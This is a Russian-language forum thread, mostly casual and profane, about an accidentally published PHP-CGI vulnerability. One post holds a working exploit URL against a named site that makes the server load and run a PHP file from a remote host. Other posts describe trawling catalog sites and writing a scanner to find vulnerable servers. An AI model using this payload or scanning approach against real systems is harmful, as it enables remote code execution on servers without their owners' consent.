Критическая уязвимость PHP случайно опубликована в открытом доступе

еб... работает, нихуасе

 

Все главные уязвимые сервер сейчас под ошибкой 500, это кто ж такой кривой мля.
Или это кто то специально положил ...

 

Ага, и багу залатали!

 

Одно дело посмотреть сорцы функц\модуля другое весь движок мозг выкипит.

 

rekonn.ru/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://boards.dishretailer.com/customavatars/404.php
что то не то)

 

BigBear
а что ты хотел?
уязвимость в паблке)

 

второй год в паблике вроде как

 

Пруфлинк в студию!

 

За тобой уже выехали.

 

А у каких были?

 

РБК

 

хи, я листал сайты ЯК в поисках уязвимых, и как раз перед рбк почему то приостановился и потом перешел в другую категорию(

 

Наконец нашел время написать сканер. Сканил на наличие

PHP:

<?(php){0,1}

Из 2000 проверенных сайтов ни одного уязвимого.

Один только facebook.com/

 

у них же fastcgi вроде

 

вот только "ляпнуть" ...

 

А ведь фейсбук какгбэ намекает ))

 

Я так и не понял,че она вдруг актуальной стала ? Ну,бага была известна,так че,никто не обратил внимание на неё ? Бред какой-то.

хех,не знал,что фейс на фреймворке:

PHP:

<?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS';


Или это баг какой-то,что закрывающего тега нет ?

А теперь по теме - неужели вам так впадлу поставить php-cgi на апаче?

 

Lol, на фейсбуке вовсе не бага. Таким образом они ищут себе специалистов.